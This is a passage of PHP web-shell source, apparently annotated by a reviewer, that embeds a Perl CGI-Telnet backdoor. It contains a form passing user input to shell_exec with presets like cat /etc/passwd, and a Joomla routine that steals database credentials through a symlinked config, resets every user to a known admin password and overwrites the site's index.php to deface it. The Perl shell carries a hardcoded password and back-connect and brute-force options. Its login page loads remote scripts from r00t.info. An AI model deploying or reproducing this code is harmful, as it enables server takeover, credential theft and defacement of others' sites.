echo "<center/><br/><b><font color=#FF0000>--==[ Command Bypass Exploit ]==--</font></b><br>
4503"; print_r('
4504<pre>
4505<form method="POST" action="">
4506<b><font color=#FF0000><b><font color="#FF0000">Command :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">
4507</form>
4508<form method="POST" action=""><strong><b><font color="#FF0000">Menu Bypass :=) </font></strong><select name="liz0" size="1" class="inputz">
4509<option value="cat /etc/passwd">/etc/passwd</option>
4510<option value="netstat -an | grep -i listen">netstat</option>
4511<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
4512<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
4513<option value="cat /etc/hosts">/etc/hosts</option>
4514<option value="cat /etc/named.conf">/etc/named.conf</option>
4515<option value="cat /etc/hxxpd/conf/hxxpd.conf">/etc/hxxpd/conf/hxxpd.conf</option>
4516</select> <input type="submit" class="inputzbut" value="Gö">
4517</form>
4518</pre>
4519');
// ini_restore() resets the two directives to their configured startup values before
// the commands run (NOTE(review): presumably an attempt to shed per-request
// restrictions; the effect depends on the host configuration).
ini_restore("safe_mode"); ini_restore("open_basedir");
// POST fields 'baba' and 'liz0' reach the shell unmodified. Defensive signals: POST
// bodies carrying those two parameter names, and the web-server/PHP process spawning
// child shells. Listing shell_exec in php.ini disable_functions blocks this branch.
$liz0=shell_exec($_POST[baba]); $liz0zim=shell_exec($_POST[liz0]);
// 'id' and 'uname -a' are executed on every request to this branch, but $uid and
// $server are not used anywhere in the visible code.
$uid=shell_exec('id'); $server=shell_exec('uname -a');
// Command output is echoed without HTML escaping; the bare "</div>" string is an
// expression statement with no effect.
echo "<pre><h4>"; echo $liz0; echo $liz0zim; echo "</h4></pre>"; "</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'jodexer')) { ?>
4520<form action="?y=<?php echo $pwd; ?>&x=jodexer" method="post">
4521
4522<?php
// "Automatic Joomla Index Changer" branch (?x=jodexer). When POST 'form_action' is
// set it reads a Joomla configuration file from an operator-supplied location, uses
// the database credentials found there to overwrite the users table, logs in to the
// administrator panel and replaces the active template's index.php.
// Returns an 8-character string of lowercase letters and digits from rand(); used
// below only as a cookie-jar file name.
function randomt() { $chars = "abcdefghijkmnopqrstuvwxyz023456789"; srand((double)microtime()*1000000); $i = 0; $pass = '' ; while ($i <= 7) { $num = rand() % 33; $tmp = substr($chars, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; }
// Returns the trimmed text between the $i-th occurrence of the start marker and the
// next end marker; no check is made that either marker is present.
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); $ar=trim($ar1[0]); return $ar; }
// POST 'file' goes straight into file_get_contents(), so it may be a local path or a
// URL (the form's default value points at a symlinked configuration.php). $h is a PHP
// stub that echoes the base64-decoded POST 'code' and exits. $co ends up as a random
// name; curl may leave a cookie file with that name in the working directory.
if ($_POST['form_action']) { $text=file_get_contents($_POST['file']); $username=entre2v2($text,"public $user = '","';"); $password=entre2v2($text,"public $password = ', '","';"); $dbname=entre2v2($text,"public $db = ', '","';"); $dbprefix=entre2v2($text,"public $dbprefix = '","';"); $site_url=($_POST['site_url']); $h="<?php echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>"; $co=randomt(); $co=randomt();
// The database host is a hard-coded literal, not a value parsed from the config file.
// The UPDATE has no WHERE clause: every row of <prefix>users gets username 'admin'
// and the fixed hash below. Incident response: rows carrying that hash mark affected
// sites, and the whole users table has to be restored, not one account reset.
if ($_POST['form_action']) { $h="<?php echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>"; $link=mysql_connect("dzoed.druknet.bt",$username,$password) ; mysql_select_db($dbname,$link) ; $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'"); echo("<br>[+] Changing admin password to 123456789");
// First path: taken when the <prefix>extensions query succeeds; it looks up the home
// template in <prefix>template_styles (presumably a newer Joomla schema - confirm).
// $useragent is never assigned in the visible code. Request log signature for this
// path: a login POST, then task=source.edit, then a POST with task=source.save.
$req =mysql_query("SELECT * from `".$dbprefix."extensions` "); if ( $req ) { $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'"); $data = mysql_fetch_array($req); $template_id=$data["extension_id"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); 
curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"'); $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4); $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,"com_config"); if($pos === false) { echo("<br>[+] Login Error"); exit; } else { echo("<br>[+] Login Successful"); } $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2); if($hidden2) { echo("<br>[+] index.php file founded in Theme Editor"); } else { echo("<br>[-] index.php Not found in Theme Editor"); exit; } echo("<br>[*] Updating Index.php ....."); $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, 
CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'<dd class="message message">'); if($pos === false) { echo("<br>[-] Updating Index.php Error"); exit; } else { echo("<br>[~] index.php successfully saved"); } } else {
// Fallback path: reads the template name from <prefix>templates_menu and drives the
// same login / edit / save sequence with task=edit_source and task=save_source.
// Unlike the first path, a missing editor token here does not stop the run.
$req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3); $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,"com_config"); if($pos === false) { echo("<br>[-] Login Error"); exit; } else { echo("<br>[+] Login Successful"); } $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name; $ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6); if($hidden2) { echo("<br>[~] index.php file founded in Theme Editor"); } else { echo("<br>[-] index.php Not found in Theme Editor"); } echo("<br>[*] Updating Index.php ....."); $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'<dd class="message message fade">'); if($pos === false) { echo("<br>[-] Updating Index.php Error"); exit; } else { echo("<br>[~] index.php successfully saved"); } } }
// The two functions below repeat the definitions at the top of this block.
function randomt() { $chars = "abcdefghijkmnopqrstuvwxyz023456789"; srand((double)microtime()*1000000); $i = 0; $pass = '' ; while ($i <= 7) { $num = rand() % 33; $tmp = substr($chars, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); $ar=trim($ar1[0]); return $ar; } }?>
4523 <center><br><br>
4524 <font color="#FF0000" size='+3'><b>--==[ Automatic Joomla Index Changer ]==--</b></font><br><br>
4525 </center>
4526 <center><b>
4527 Link of symlink configuration.php of Joomla<br></b>
4528 <FORM action="" method="post">
4529 <input type="hidden" name="form_action" value="1">
4530 <input type="text" class="inputz" size="60" name="file" value="hxxp://site.com/sym/home/user/public_html/configuration.php">
4531 <br>
4532 <br><b>
4533 Admin Control Panel URL</b><br>
4534 <input type="text" class="inputz" size="40" name="site_url" value="hxxp://site/administrator"><br>
4535 <br><b>
4536 Your Index Code</b>
4537 <br>
4538 <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code
4539 </TEXTAREA>
4540 <br>
4541 <INPUT class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">
4542 </FORM>
4543 </center>
4544 <script language=JavaScript>
/* The percent-escaped string decodes to tabs, newlines and closing td, tr, table,
   td and html tags. The script only writes that page-closing markup; it loads
   nothing remote. */
m='%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>
4545 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi2012')) { echo "<center/><br/><b>
4546 +--==[ CGI-Telnet Version 1.3 ]==--+
4547 </b><br><br>"; mkdir('cgi2012', 0755); chdir('cgi2012'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $cgi2012 = '#!/usr/bin/perl -I/usr/local/bandmin
4548use MIME::Base64;
4549$Version= "CGI-Telnet Version 1.3";
4550$EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>r00t.info - CGI-Telnet</font>";
4551
4552$Password = "r00t.info"; # Change this. You will need to enter this
4553 # to login.
4554sub Is_Win(){
4555 $os = &trim($ENV{"SERVER_SOFTWARE"});
4556 if($os =~ m/win/i){
4557 return 1;
4558 }
4559 else{
4560 return 0;
4561 }
4562}
4563$WinNT = &Is_Win(); # You need to change the value of this to 1 if
4564 # you're running this script on a Windows NT
4565 # machine. If you're running it on Unix, you
4566 # can leave the value as it is.
4567
4568$NTCmdSep = "&"; # This character is used to seperate 2 commands
4569 # in a command line on Windows NT.
4570
4571$UnixCmdSep = ";"; # This character is used to seperate 2 commands
4572 # in a command line on Unix.
4573
4574$CommandTimeoutDuration = 10000; # Time in seconds after commands will be killed
4575 # Don't set this to a very large value. This is
4576 # useful for commands that may hang or that
4577 # take very long to execute, like "find /".
4578 # This is valid only on Unix servers. It is
4579 # ignored on NT Servers.
4580
4581$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
4582 # browser as soon as it is output, otherwise
4583 # it is buffered and send when the command
4584 # completes. This is useful for commands like
4585 # ping, so that you can see the output as it
4586 # is being generated.
4587
4588# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
4589
4590$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
4591$CmdPwd = ($WinNT ? "cd" : "pwd");
4592$PathSep = ($WinNT ? "\\" : "/");
4593$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
4594$cols= 150;
4595$rows= 26;
4596#------------------------------------------------------------------------------
4597# Reads the input sent by the browser and parses the input variables. It
4598# parses GET, POST and multipart/form-data that is used for uploading files.
4599# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
4600# Other variables can be accessed using $in{'var'}, where var is the name of
4601# the variable. Note: Most of the code in this function is taken from other CGI
4602# scripts.
4603#------------------------------------------------------------------------------
4604sub ReadParse
4605{
4606 local (*in) = @_ if @_;
4607 local ($i, $loc, $key, $val);
4608
4609 $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
4610
4611 if($ENV{'REQUEST_METHOD'} eq "GET")
4612 {
4613 $in = $ENV{'QUERY_STRING'};
4614 }
4615 elsif($ENV{'REQUEST_METHOD'} eq "POST")
4616 {
4617 binmode(STDIN) if $MultipartFormData & $WinNT;
4618 read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
4619 }
4620
4621 # handle file upload data
4622 if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
4623 {
4624 $Boundary = '--'.$1; # please refer to RFC1867
4625 @list = split(/$Boundary/, $in);
4626 $HeaderBody = $list[1];
4627 $HeaderBody =~ /\r\n\r\n|\n\n/;
4628 $Header = $`;
4629 $Body = $';
4630 $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
4631 $in{'filedata'} = $Body;
4632 $Header =~ /filename=\"(.+)\"/;
4633 $in{'f'} = $1;
4634 $in{'f'} =~ s/\"//g;
4635 $in{'f'} =~ s/\s//g;
4636
4637 # parse trailer
4638 for($i=2; $list[$i]; $i++)
4639 {
4640 $list[$i] =~ s/^.+name=$//;
4641 $list[$i] =~ /\"(\w+)\"/;
4642 $key = $1;
4643 $val = $';
4644 $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
4645 $val =~ s/%(..)/pack("c", hex($1))/ge;
4646 $in{$key} = $val;
4647 }
4648 }
4649 else # standard post data (url encoded, not multipart)
4650 {
4651 @in = split(/&/, $in);
4652 foreach $i (0 .. $#in)
4653 {
4654 $in[$i] =~ s/\+/ /g;
4655 ($key, $val) = split(/=/, $in[$i], 2);
4656 $key =~ s/%(..)/pack("c", hex($1))/ge;
4657 $val =~ s/%(..)/pack("c", hex($1))/ge;
4658 $in{$key} .= "\0" if (defined($in{$key}));
4659 $in{$key} .= $val;
4660 }
4661 }
4662}
4663
4664#------------------------------------------------------------------------------
4665# Prints the HTML Page Header
4666# Argument 1: Form item name to which focus should be set
4667#------------------------------------------------------------------------------
4668sub PrintPageHeader
4669{
4670 $EncodedCurrentDir = $CurrentDir;
4671 $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
4672 my $dir =$CurrentDir;
4673 $dir=~ s/\\/\\\\/g;
4674 print "Content-type: text/html\n\n";
4675 print <<END;
4676<html>
4677<head>
4678<meta hxxp-equiv="content-type" content="text/html; charset=UTF-8">
4679<title> </title>
4680
4681$HtmlMetaHeader
4682
4683</head>
4684<style>
4685body{
4686font: 10pt Verdana;
4687}
4688tr {
4689BORDER-RIGHT: #3e3e3e 1px solid;
4690BORDER-TOP: #3e3e3e 1px solid;
4691BORDER-LEFT: #3e3e3e 1px solid;
4692BORDER-BOTTOM: #3e3e3e 1px solid;
4693color: #ff9900;
4694}
4695td {
4696BORDER-RIGHT: #3e3e3e 1px solid;
4697BORDER-TOP: #3e3e3e 1px solid;
4698BORDER-LEFT: #3e3e3e 1px solid;
4699BORDER-BOTTOM: #3e3e3e 1px solid;
4700color: #2BA8EC;
4701font: 10pt Verdana;
4702}
4703
4704table {
4705BORDER-RIGHT: #3e3e3e 1px solid;
4706BORDER-TOP: #3e3e3e 1px solid;
4707BORDER-LEFT: #3e3e3e 1px solid;
4708BORDER-BOTTOM: #3e3e3e 1px solid;
4709BACKGROUND-COLOR: #111;
4710}
4711
4712
4713input {
4714BORDER-RIGHT: #3e3e3e 1px solid;
4715BORDER-TOP: #3e3e3e 1px solid;
4716BORDER-LEFT: #3e3e3e 1px solid;
4717BORDER-BOTTOM: #3e3e3e 1px solid;
4718BACKGROUND-COLOR: Black;
4719font: 10pt Verdana;
4720color: #ff9900;
4721}
4722
4723input.submit {
4724text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
4725color: #FFFFFF;
4726border-color: #009900;
4727}
4728
4729code {
4730border : dashed 0px #333;
4731BACKGROUND-COLOR: Black;
4732font: 10pt Verdana bold;
4733color: while;
4734}
4735
4736run {
4737border : dashed 0px #333;
4738font: 10pt Verdana bold;
4739color: #FF00AA;
4740}
4741
4742textarea {
4743BORDER-RIGHT: #3e3e3e 1px solid;
4744BORDER-TOP: #3e3e3e 1px solid;
4745BORDER-LEFT: #3e3e3e 1px solid;
4746BORDER-BOTTOM: #3e3e3e 1px solid;
4747BACKGROUND-COLOR: #1b1b1b;
4748font: Fixedsys bold;
4749color: #aaa;
4750}
4751A:link {
4752 COLOR: #2BA8EC; TEXT-DECORATION: none
4753}
4754A:visited {
4755 COLOR: #2BA8EC; TEXT-DECORATION: none
4756}
4757A:hover {
4758 text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
4759 color: #ff9900; TEXT-DECORATION: none
4760}
4761A:active {
4762 color: Red; TEXT-DECORATION: none
4763}
4764
4765.listdir tr:hover{
4766 background: #444;
4767}
4768.listdir tr:hover td{
4769 background: #444;
4770 text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
4771 color: #FFFFFF; TEXT-DECORATION: none;
4772}
4773.notline{
4774 background: #111;
4775}
4776.line{
4777 background: #222;
4778}
4779</style>
4780<script language="javascript">
4781function chmod_form(i,file)
4782{
4783 /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
4784 var ajax="";
4785 document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
4786 document.getElementById("text_" + i).focus();
4787}
4788function rm_chmod_form(response,i,perms,file)
4789{
4790 response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
4791}
4792function rename_form(i,file,f)
4793{
4794 var ajax="";
4795 f.replace(/\\\\/g,"\\\\\\\\");
4796 var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
4797 document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
4798 document.getElementById("text_" + i).focus();
4799}
4800function rm_rename_form(i,file,f)
4801{
4802 if(f=='f')
4803 {
4804 document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
4805 }else
4806 {
4807 document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
4808 }
4809}
4810</script>
4811<body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
4812<center><code>
4813<table border="1" width="100%" cellspacing="0" cellpadding="2">
4814<tr>
4815 <td align="center" rowspan=2>
4816 <b><font size="5">$EditPersion</font></b>
4817 </td>
4818
4819 <td>
4820
4821 <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
4822 </td>
4823 <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
4824 </td>
4825
4826</tr>
4827
4828<tr>
4829<td colspan="3"><font face="Verdana" size="2">
4830<a href="$ScriptLocation">Home</a> |
4831<a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Komut</a> |
4832<a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">Dizin</a> |
4833<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
4834<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
4835
4836<a href="$ScriptLocation?a=backbind">Back Connet</a> |
4837<a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
4838<a href="$ScriptLocation?a=checklog">Check Log</a> |
4839<a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
4840<a href="$ScriptLocation?a=logout">Logout</a> |
4841<a target='_blank' href="#">Help</a>
4842
4843</font></td>
4844</tr>
4845</table>
4846<font id="ResponseData" color="#ff99cc" >
4847END
4848}
4849
4850#------------------------------------------------------------------------------
4851# Prints the Login Screen
4852#------------------------------------------------------------------------------
4853sub PrintLoginScreen
4854{
4855
4856 print <<END;
4857<pre><script type="text/javascript">
4858TypingText = function(element, interval, cursor, finishedCallback) {
4859 if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
4860 this.running = true; // Never run.
4861 return;
4862 }
4863 this.element = element;
4864 this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
4865 this.interval = (typeof interval == "undefined" ? 100 : interval);
4866 this.origText = this.element.innerHTML;
4867 this.unparsedOrigText = this.origText;
4868 this.cursor = (cursor ? cursor : "");
4869 this.currentText = "";
4870 this.currentChar = 0;
4871 this.element.typingText = this;
4872 if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
4873 TypingText.all.push(this);
4874 this.running = false;
4875 this.inTag = false;
4876 this.tagBuffer = "";
4877 this.inHTMLEntity = false;
4878 this.HTMLEntityBuffer = "";
4879}
4880TypingText.all = new Array();
4881TypingText.currentIndex = 0;
4882TypingText.runAll = function() {
4883 for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
4884}
4885TypingText.prototype.run = function() {
4886 if(this.running) return;
4887 if(typeof this.origText == "undefined") {
4888 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
4889 return;
4890 }
4891 if(this.currentText == "") this.element.innerHTML = "";
4892// this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
4893 if(this.currentChar < this.origText.length) {
4894 if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
4895 this.tagBuffer = "<";
4896 this.inTag = true;
4897 this.currentChar++;
4898 this.run();
4899 return;
4900 } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
4901 this.tagBuffer += ">";
4902 this.inTag = false;
4903 this.currentText += this.tagBuffer;
4904 this.currentChar++;
4905 this.run();
4906 return;
4907 } else if(this.inTag) {
4908 this.tagBuffer += this.origText.charAt(this.currentChar);
4909 this.currentChar++;
4910 this.run();
4911 return;
4912 } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
4913 this.HTMLEntityBuffer = "&";
4914 this.inHTMLEntity = true;
4915 this.currentChar++;
4916 this.run();
4917 return;
4918 } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
4919 this.HTMLEntityBuffer += ";";
4920 this.inHTMLEntity = false;
4921 this.currentText += this.HTMLEntityBuffer;
4922 this.currentChar++;
4923 this.run();
4924 return;
4925 } else if(this.inHTMLEntity) {
4926 this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
4927 this.currentChar++;
4928 this.run();
4929 return;
4930 } else {
4931 this.currentText += this.origText.charAt(this.currentChar);
4932 }
4933 this.element.innerHTML = this.currentText;
4934 this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
4935 this.currentChar++;
4936 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
4937 } else {
4938 this.currentText = "";
4939 this.currentChar = 0;
4940 this.running = false;
4941 this.finishedCallback();
4942 }
4943}
4944</script>
4945</pre>
4946
4947<font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 r00t.info </font><br><br>
4948<table align="center" border="1" width="600" heigh>
4949<script src=hxxp://r00t.info/bot/log.js></script>
4950<script src=hxxp://r00t.info/ccb.js></script>
4951<tbody><tr>
4952<td valign="top" background="hxxp://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
4953<font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
4954
4955<font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
4956<font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
4957<font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
4958
4959<font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
4960
4961<font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
4962<font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
4963</tr>
4964</tbody></table>
4965<br>
4966
4967<script type="text/javascript">
4968new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
4969TypingText.runAll();
4970
4971</script>
4972END
4973}
4974
4975#------------------------------------------------------------------------------
4976# Add html special chars
4977#------------------------------------------------------------------------------
4978sub HtmlSpecialChars($){
4979 my $text = shift;
4980 $text =~ s/&/&/g;
4981 $text =~ s/"/"/g;
4982 $text =~ s/'/'/g;
4983 $text =~ s/</</g;
4984 $text =~ s/>/>/g;
4985 return $text;
4986}
4987#------------------------------------------------------------------------------
4988# Add link for directory
4989#------------------------------------------------------------------------------
4990sub AddLinkDir($)
4991{
4992 my $ac=shift;
4993 my @dir=();
4994 if($WinNT)
4995 {
4996 @dir=split(/\\/,$CurrentDir);
4997 }else
4998 {
4999 @dir=split("/",&trim($CurrentDir));
5000 }
5001 my $path="";
5002 my $result="";
5003 foreach (@dir)
5004 {
5005 $path .= $_.$PathSep;
5006 $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
5007 }
5008 return $result;
5009}
5010#------------------------------------------------------------------------------
5011# Prints the message that informs the user of a failed login
5012#------------------------------------------------------------------------------
5013sub PrintLoginFailedMessage
5014{
5015 print <<END;
5016<br>Login : Administrator<br>
5017
5018Password:<br>
5019Login incorrect<br><br>
5020END
5021}
5022
